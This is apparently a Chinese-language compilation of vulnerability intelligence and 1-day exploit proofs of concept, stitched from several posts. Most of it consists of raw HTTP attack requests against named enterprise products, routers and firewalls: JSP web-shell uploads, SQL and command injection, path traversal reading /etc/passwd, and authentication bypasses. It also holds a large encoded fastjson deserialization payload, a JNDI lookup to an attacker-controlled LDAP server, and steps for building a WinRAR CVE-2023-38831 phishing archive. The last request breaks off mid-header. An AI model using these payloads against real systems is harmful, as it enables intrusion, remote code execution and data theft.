12月漏洞情报 速达软件全系产品存在任意文件上传漏洞POST /report/DesignReportSave.jsp?report=../625248.jsp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Connection: close Host: 127.0.0.1 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Upgrade-Insecure-Requests: 1 Content-Type: application/octet-stream Content-Length: 28 <% out.print(""984969719"");%> 红帆 ioffice ioassistance2.asmx存在sql注入POST /ioffice/prg/set/wss/ioAssistance2.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 Soapaction: ""http://tempuri.org/GetLoginedEmpNoReadedInf"" User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 <?xml version=""1.0"" encoding=""utf-8""?> <soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001 /XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""> <soap:Body> <GetLoginedEmpNoReadedInf xmlns=""http://tempuri.org/""> <sql>select host_name()</sql> </GetLoginedEmpNoReadedInf> </soap:Body> </soap:Envelope> 万户协同办公平台ezoffice wpsservlet接口存在任意文件上传POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=40067&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept-Encoding: gzip, deflate Accept: */* Connection: close Cache-Control: max-age=0 Content-Length: 176 Content-Type: multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb --55aeb894de1521afe560c924fad7c6fb Content-Disposition: form-data; name=""NewFile""; filename=""40067.jsp"" <% out.print(""797276100"");%> --55aeb894de1521afe560c924fad7c6fb-- Honeywell Products远程命令执行漏洞(CVE-2023-3710)POST /loadfile.lp?pageid=Configure HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 Connection: close Content-Length: 56 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1 云优cms request_uri存在代码执行漏洞GET /index.php?s=wap/index/index&asdasd=aa"";print_r(md5(12356));exit;?> HTTP/1.1 Host: User-Agent: Mozilla/5.0 多个产商安全产品存在命令执行GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls 云时空社会化商业ERP系统gpy文件上传POST /servlet/fileupload/gpy HTTP/1.1 Host:IP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388 Content-Length: 215 --4eea98d02AEa93f60ea08dE3C18A1388 Content-Disposition: form-data; name=""file1""; filename=""2.jsp"" Content-Type: application/octet-stream <% out.println(""hello flnb""); %> --4eea98d02AEa93f60ea08dE3C18A1388-- OwnCloud 敏感信息泄漏漏洞（CVE-2023-49103）url存在/owncloud/路径时需要保留 /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php 若依管理系统存在任意文件读取漏洞CNVD-2021-15555GET /common/download/resource?resource=/profile/../../../../../../../../../../etc/passwd HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Connection: Keep-Alive Tongweb selectApp.jsp任意文件上传POST /heimdall/pages/cla/selectApp.jsp HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=fa2ef860e94d564632e291131d20064c User-Agent: Mozilla/5.0 --fa2ef860e94d564632e291131d20064c Content-Disposition: form-data; name=""app_fileName"" Li4vLi4vYXBwbGljYXRpb25zL2hlaW1kYWxsLzEyM3F3ZTEuanNw --fa2ef860e94d564632e291131d20064c Content-Disposition: form-data; name=""app"" --fa2ef860e94d564632e291131d20064c Content-Disposition: form-data; name=""className"" test --fa2ef860e94d564632e291131d20064c Content-Disposition: form-data; name=""uploadApp""; filename=""test.jar"" Content-Type: application/java-archive <% out.println(16156223+223415616); %> --fa2ef860e94d564632e291131d20064c-- 云安宝-云匣子 config fastjson RCEPOST /3.0/authService/config HTTP/2 Host: XXXX Accept: application/json, text/plain, */* Content-Type: application/json;charset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36 Referer: https://XXXX/ Cmd: echo 7dgdggddg Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Priority: u=1, i Content-Length: 18907 {""a"":{""@type"":""java.lang.Class"",""val"": ""com.mchange.v2.c3p0.WrapperConnectionPoolDataSource""},""b"":{""@type"": ""com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"",""userOverridesAsString"":""HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200206a617661782e7363726970742e536372697074456e67696e654d616e61676572000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000b6e6577496e7374616e6365757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007371007e00137571007e0018000000017400026a7374000f676574456e67696e6542794e616d657571007e001b00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00180000000174202b747279207b0a20206c6f616428226e6173686f726e3a6d6f7a696c6c615f636f6d7061742e6a7322293b0a7d20636174636820286529207b7d0a66756e6374696f6e20676574556e7361666528297b0a202076617220746865556e736166654d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e556e7361666522292e6765744465636c617265644669656c642827746865556e7361666527293b0a2020746865556e736166654d6574686f642e73657441636365737369626c652874727565293b200a202072657475726e20746865556e736166654d6574686f642e676574286e756c6c293b0a7d0a66756e6374696f6e2072656d6f7665436c617373436163686528636c617a7a297b0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617a7a416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c61737328636c617a7a2c6a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c61737322292e6765745265736f75726365417353747265616d2822436c6173732e636c61737322292e72656164416c6c427974657328292c6e756c6c293b0a2020766172207265666c656374696f6e446174614669656c64203d20636c617a7a416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428227265666c656374696f6e4461746122293b0a2020756e736166652e7075744f626a65637428636c617a7a2c756e736166652e6f626a6563744669656c644f6666736574287265666c656374696f6e446174614669656c64292c6e756c6c293b0a7d0a66756e6374696f6e206279706173735265666c656374696f6e46696c7465722829207b0a2020766172207265666c656374696f6e436c6173733b0a2020747279207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a646b2e696e7465726e616c2e7265666c6563742e5265666c656374696f6e22293b0a20207d20636174636820286572726f7229207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e7265666c6563742e5265666c656374696f6e22293b0a20207d0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617373427566666572203d207265666c656374696f6e436c6173732e6765745265736f75726365417353747265616d28225265666c656374696f6e2e636c61737322292e72656164416c6c427974657328293b0a2020766172207265666c656374696f6e416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c617373287265666c656374696f6e436c6173732c20636c6173734275666665722c206e756c6c293b0a2020766172206669656c6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226669656c6446696c7465724d617022293b0a2020766172206d6574686f6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226d6574686f6446696c7465724d617022293b0a2020696620286669656c6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286669656c6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a2020696620286d6574686f6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286d6574686f6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a202072656d6f7665436c6173734361636865286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173732229293b0a7d0a66756e6374696f6e2073657441636365737369626c652861636365737369626c654f626a656374297b0a2020202076617220756e73616665203d20676574556e7361666528293b0a20202020766172206f766572726964654669656c64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e7265666c6563742e41636365737369626c654f626a65637422292e6765744465636c617265644669656c6428226f7665727269646522293b0a20202020766172206f6666736574203d20756e736166652e6f626a6563744669656c644f6666736574286f766572726964654669656c64293b0a20202020756e736166652e707574426f6f6c65616e2861636365737369626c654f626a6563742c206f66667365742c2074727565293b0a7d0a66756e6374696f6e20646566696e65436c617373286279746573297b0a202076617220636c7a203d206e756c6c3b0a20207661722076657273696f6e203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226a6176612e76657273696f6e22293b0a202076617220756e73616665203d20676574556e7361666528290a202076617220636c6173734c6f61646572203d206e6577206a6176612e6e65742e55524c436c6173734c6f61646572286a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6e65742e55524c22292c203029293b0a20207472797b0a202020206966202876657273696f6e2e73706c697428222e22295b305d203e3d20313129207b0a2020202020206279706173735265666c656374696f6e46696c74657228293b0a20202020646566696e65436c6173734d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173734c6f6164657222292e6765744465636c617265644d6574686f642822646566696e65436c617373222c206a6176612e6c616e672e436c6173732e666f724e616d6528225b4222292c6a6176612e6c616e672e496e74656765722e545950452c206a6176612e6c616e672e496e74656765722e54595045293b0a2020202073657441636365737369626c6528646566696e65436c6173734d6574686f64293b0a202020202f2f20e7bb95e8bf872073657441636365737369626c65200a20202020636c7a203d20646566696e65436c6173734d6574686f642e696e766f6b6528636c6173734c6f616465722c2062797465732c20302c2062797465732e6c656e677468293b0a202020207d656c73657b0a2020202020207661722070726f74656374696f6e446f6d61696e203d206e6577206a6176612e73656375726974792e50726f74656374696f6e446f6d61696e286e6577206a6176612e73656375726974792e436f6465536f75726365286e756c6c2c206a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e73656375726974792e636572742e436572746966696361746522292c203029292c206e756c6c2c20636c6173734c6f616465722c205b5d293b0a202020202020636c7a203d20756e736166652e646566696e65436c617373286e756c6c2c2062797465732c20302c2062797465732e6c656e6774682c20636c6173734c6f616465722c2070726f74656374696f6e446f6d61696e293b0a202020207d0a20207d6361746368286572726f72297b0a202020206572726f722e7072696e74537461636b547261636528293b0a20207d66696e616c6c797b0a2020202072657475726e20636c7a3b0a20207d0a7d0a66756e6374696f6e206261736536344465636f6465546f427974652873747229207b0a20207661722062743b0a20207472797b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e4241534536344465636f64657222292e6e6577496e7374616e636528292e6465636f646542756666657228737472293b0a20207d63617463682865297b7d0a2020696620286274203d3d206e756c6c297b0a202020207472797b0a2020202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e42617365363422292e6e6577496e7374616e636528292e6765744465636f64657228292e6465636f646528737472293b0a202020207d63617463682865297b7d0a20207d0a2020696620286274203d3d206e756c6c297b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226f72672e6170616368652e636f6d6d6f6e732e636f6465632e62696e6172792e42617365363422292e6e6577496e7374616e636528292e6465636f646528737472290a20207d0a202072657475726e2062743b0a7d0a76617220636f64653d2279763636766741414144494177516f41435142524367425341464d4b414649415641674156516f4156674258434142594277425a4367414841466f484146734b41467741585167415867674158776741594167415951674159676f414277426a4341426b4341426c4277426d43674263414763494147674b4144304161516f41435142714341427243414273434142744341427543674154414738494148414b4148454163676f414577427a43674154414851494148554b41424d4164676741647767416541634165516f414a5142524367416c41486f494148734b414355416641674166516741666767416677674167416f41675143434367434241494d484149514b4149554168676f414d414348434143494367417741496b4b4144414169676f414d41434c436743464149774b414955416a5163416a676f414f5142384341435043674139414a4148414a454241415938615735706444344241414d6f4b565942414152446232526c4151415054476c755a55353162574a6c636c5268596d786c4151414c614746755a464a6c6358566c633351424141704665474e6c634852706232357a415141455a58686c597745414a69684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576624746755a79395464484a70626d63374151414e553352685932744e5958425559574a735a5163415a6763416b6763416b77634168416341655163416a6763416c4145414344786a62476c756158512b4151414b55323931636d4e6c526d6c735a51454143464e464d53357159585a684441412b41443848414a554d414a59416c7777416d41435a4151413862334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4a6c6358566c63335244623235305a586830534739735a4756794277436144414362414a77424142526e5a5852535a5846315a584e3051585230636d6c696458526c6377454144327068646d4576624746755a7939446247467a637777416e51436541514151616d4632595339735957356e4c303969616d566a644163416e7777416f4143684151424162334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4e6c636e5a735a5852535a5846315a584e3051585230636d6c696458526c637745414332646c64464a6c63334276626e4e6c4151414b5a325630556d56786457567a6441454148577068646d46344c6e4e6c636e5a735a58517555325679646d786c64464a6c63334276626e4e6c4151414a5a32563056334a706447567944414369414a34424143567159585a686543357a5a584a32624756304c6d6830644841755348523063464e6c636e5a735a5852535a5846315a584e304151414a5a325630534756685a47567941514151616d4632595339735957356e4c314e30636d6c755a7777416f77436b415141445932316b444142454145554d414b5541706745414233427961573530624734424141566d6248567a6141454142574e7362334e6c415141414441436e414b674241416476637935755957316c42774370444143714145554d414b734172417741725143734151414464326c7544414375414b3842414152776157356e415141434c5734424142647159585a684c327868626d6376553352796157356e516e56706247526c636777417341437841514146494331754944514d414c4941724145414169396a41514146494331304944514241414a7a614145414169316a4277437a44414330414c554d414551417467454145577068646d4576645852706243395459324675626d56794277435344414333414c674d4144344175514541416c786844414336414c734d414c774176517741766743734441432f414c674d414d41415077454145327068646d4576624746755a79394665474e6c63485270623234424142426a623231745957356b494735766443427564577873444142434144384241414e54525445424142467159585a684c327868626d637655484a765932567a637745414531744d616d4632595339735957356e4c314e30636d6c755a7a734241424e7159585a684c327868626d63765647687962336468596d786c41514151616d4632595339735957356e4c31526f636d56685a41454144574e31636e4a6c626e525561484a6c595751424142516f4b55787159585a684c327868626d6376564768795a57466b4f7745414657646c64454e76626e526c654852446247467a633078765957526c636745414753677054477068646d4576624746755a7939446247467a633078765957526c636a73424142567159585a684c327868626d63765132786863334e4d6232466b5a58494241416c736232466b5132786863334d424143556f54477068646d4576624746755a79395464484a70626d63374b55787159585a684c327868626d63765132786863334d374151414a5a325630545756306147396b415142414b45787159585a684c327868626d6376553352796157356e4f31744d616d4632595339735957356e4c304e7359584e7a4f796c4d616d4632595339735957356e4c334a6c5a6d786c59335176545756306147396b4f77454147477068646d4576624746755a7939795a575a735a574e304c30316c644768765a414541426d6c75646d39725a5145414f53684d616d4632595339735957356e4c303969616d566a6444746254477068646d4576624746755a793950596d706c593351374b55787159585a684c327868626d637654324a715a574e304f7745414557646c6445526c59327868636d566b545756306147396b4151414e6332563051574e6a5a584e7a61574a735a514541424368614b5659424141686e5a5852446247467a637745414579677054477068646d4576624746755a7939446247467a637a734241415a6c6358566862484d424142556f54477068646d4576624746755a793950596d706c593351374b566f424142427159585a684c327868626d637655336c7a644756744151414c5a32563055484a766347567964486b424141743062307876643256795132467a5a5145414643677054477068646d4576624746755a79395464484a70626d63374151414564484a706251454143474e76626e52686157357a415141624b45787159585a684c327868626d637651326868636c4e6c6358566c626d4e6c4f796c6141514147595842775a57356b415141744b45787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c314e30636d6c755a304a316157786b5a584937415141496447395464484a70626d63424142467159585a684c327868626d6376556e567564476c745a514541436d646c64464a31626e5270625755424142556f4b55787159585a684c327868626d6376556e567564476c745a5473424143676f5730787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c31427962324e6c63334d374151414f5a325630535735776458525464484a6c595730424142636f4b55787159585a684c326c764c306c7563485630553352795a5746744f7745414743684d616d4632595339706279394a626e423164464e30636d566862547370566745414448567a5a55526c62476c746158526c636745414a79684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576645852706243395459324675626d56794f774541423268686330356c6548514241414d6f4b566f42414152755a5868304151414f5a32563052584a7962334a5464484a6c595730424141646b5a584e30636d3935414345415051414a4141414141414145414145415067412f4141454151414141414230414151414241414141425371334141477841414141415142424141414142674142414141414541414a41454941507741434145414141414679414159414377414141524b3441414b3241414d53424c594142557371456759447651414874674149544373424137304143625941436b323441414b3241414d53433759414255737145677744765141487467414954436f5344514f39414165324141684f4b7977447651414a7467414b4f6751744c414f3941416d3241416f3642626741417259414178494f746741464567384476514148746741514f67613441414b3241414d534562594142524953424c304142316b4445684e54746741514f67635a427753324142515a426753324142515a42686b454137304143625941436a6f494751635a4251533941416c5a417849565537594143734141457a6f4a47516d344142593643686b4974674158456867457651414857514d5345314f324142415a4341533941416c5a41786b4b55375941436c635a434c59414678495a413730414237594145426b494137304143625941436c635a434c594146784961413730414237594145426b494137304143625941436c657841414141415142424141414154674154414141414577414d41425141467741564143454146674174414263414f41415941454d414751424f41426f4157514162414738414841434b414230416b414165414a59414877436a4143414175414168414c38414967446841434d412b51416b415245414a514244414141414241414241446b41435142454145554141514241414141436e41414541416741414145324b7359424d6849624b725941484a6f424b5249647541416574674166544371324143424c41553042546973534962594149706b4150796f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456969324143653241436c4c4272304145316b4445685654575151534b6c4e5a425370545471634150436f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456975324143653241436c4c4272304145316b4445697854575151534c564e5a42537054547267414c6932324143394e757741775753793241444733414449534d3759414e446f45475153324144575a4141735a424c59414e716341425249624f6757374144425a4c4c59414e3763414d68497a746741304f6753374143565a7477416d475157324143635a424c59414e5a6b4143786b457467413270774146456875324143653241436b3642526b464f675973786741484c4c59414f426b4773446f454751533241446f3642537a474141637374674134475157774f676373786741484c4c59414f426b487678493773414145414a30424277455341446b416e5145484153594141414553415273424a674141415359424b41456d41414141416742424141414165674165414141414b41414e41436b4146674171414273414b7741644143774148774174414367414c6741364143384154674178414751414d7742324144514169674132414a30414f51436c41446f4174774137414d734150414464414430424177412b415163415167454c41454d424477412b41524941507745554145414247774243415238415177456a414541424a6742434153774151774577414555424d77424841455941414143304141372b41453448414563484145674841456b564a524c3841436b4841457042427742482f7741764141594841456348414563484145674841456b4841456f484145634141516341532f3841415141474277424842774248427742494277424a4277424b4277424841414948414573484145663841424d484145662f4141494142416341527763415277634153416341535141424277424d2f5141514277424d427742482f7741434141514841456348414563484145674841456b414151634154663841435141494277424842774248427742494277424a414141414277424e4141442f414149414151634152774141414167415467412f4141454151414141414430414151414241414141434c6741504b6341424575784141454141414144414159414f514143414545414141414f41414d414141414d41414d4144514148414134415267414141416341416b59484145774141414541547741414141494155413d3d223b0a636c7a203d20646566696e65436c617373286261736536344465636f6465546f4279746528636f646529293b0a636c7a2e6e6577496e7374616e636528293b7400046576616c7571007e001b0000000171007e0023737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878;""}} NETGEAR DGND3700v2 路由器 setup.cgi 接口身份认证绕过GET /setup.cgi?next_file=passwordrecovered.htm&foo=currentsetting.htm 网神 SecGate3600 authManageSet.cgi 接口登录绕过POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Cookie: sw_login_name=admin User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc 网神 SecGate 3600 防火墙 app_av_import_save 任意文件上传POST /?g=app_av_import_save HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc Cache-Control: no-cache Pragma: no-cache Host: 218.60.144.129 Content-Length: 536 ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name=""MAX_FILE_SIZE"" 10000000 ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name=""upfile""; filename=""test.txt"" Content-Type: text/plain test ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name=""submit_post"" obj_app_upfile ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name=""__hash__"" 0b9d6b1ab7479ab69d9f71b05e0e9445 ------WebKitFormBoundaryJpMyThWnAxbcBBQc--

WinRAR CVE-2023-38831复现+POC 漏洞简介当用户尝试查看 ZIP 存档中的良性文件时，WinRAR 6.23 之前的版本允许攻击者执行任意代码。出现此问题的原因是 ZIP 存档可能包含良性文件（例如普通 .JPG 文件）以及与良性文件同名的文件夹，并且处理该文件夹的内容（可能包括可执行内容）在尝试仅访问良性文件期间。CVE-2023-38831 该漏洞于 2023 年 4 月至 2023 年 8 月期间在野外被利用。漏洞复现将诱饵文件和恶意脚本文件放置在当前目录下，诱饵文件建议使用图片（.png、jpg）或文档（.pdf）。将script.bat脚本文件中的pdf修改为我们的诱饵文件（但得注意编码问题）。执行这个漏洞利用程序的命令生成我们的钓鱼zip文件。python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>生成了一个calc.rar双击打开rar文件，再双击111.pdf即可触发bat脚本执行弹出计算器经测试，只要是双击运行的是可执行文件都可以执行，比如vbs、exe、bat等，非常的方便exp在底下CVE-2023-38831-winrar-exploit-main.zip修复方案推荐使用 WinRAR 的用户尽快升级，避免受到该问题影响，下载地址：https://www.win-rar.com/download.html。

2023HW漏洞POC、EXP补充 再补充一波poc，懒得去重了，自行筛选哈

HW情报-2023年8月20日-1day汇总 用友 NC Cloud jsinvoke 任意文件上传漏洞漏洞描述用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器中，获取系统权限app="用友-NC-Cloud"POST /uapjs/jsinvoke/?action=invoke Content-Type: application/json { "serviceName": "nc.itf.iufo.IBaseSPService", "methodName": "saveXStreamConfig", "parameterTypes": [ "java.lang.Object", "java.lang.String" ], "parameters": [ "${param.getClass().forName(param.error).newInstance().eval(param.cmd)}", "webapps/nc_web/407.jsp" ] } POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: Connection: Keep-Alive Content-Length: 253 Content-Type: application/x-www-form-urlencoded { "serviceName": "nc.itf.iufo.IBaseSPService", "methodName": "saveXStreamConfig", "parameterTypes": [ "java.lang.Object", "java.lang.String" ], "parameters": [ "${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}", "webapps/nc_web/301.jsp" ] } 用友 移动管理系统 uploadApk.do 任意文件上传漏洞/maupload/apk/a.jsp POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server Connection: close ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3 Content-Disposition: form-data; name="downloadpath"; filename="a.jsp" Content-Type: application/msword hello ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--用友GRP-U8存在信息泄露直接访问log日志，泄露敏感信息 POC GET /logs/info.log HTTP/1.1 批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E7%94%A8%E5%8F%8BGRP-U8 指纹 body="U8Accid" || title="GRP-U8" || body="用友优普信息技术有限公司" 工具利用 python3 GRP-U8_loginfo.py -u http://127.0.0.1:1111 单个url测试 python3 GRP-U8_loginfo.py -f url.txt 批量检测 会在当前目录生成存在漏洞的vuln.txt文件用友nc-cloudRCE漏洞影响NC63、NC633、NC65NC Cloud1903、NC Cloud1909NC Cloud2005、NC Cloud2105、NC Cloud2111YonBIP高级版2207 先发送数据包，返回200 POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: 127.0.0.1:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cookiets=168170496; JSESSIONID=33A343770FF.server If-None-Match: W/"1571-1589211696000" If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 249 {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]} 再发送数据包执行命令，返回命令执行结果 POST /404.jsp?error=bsh.Interpreter HTTP/1.1 Host: 127.0.0.1:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 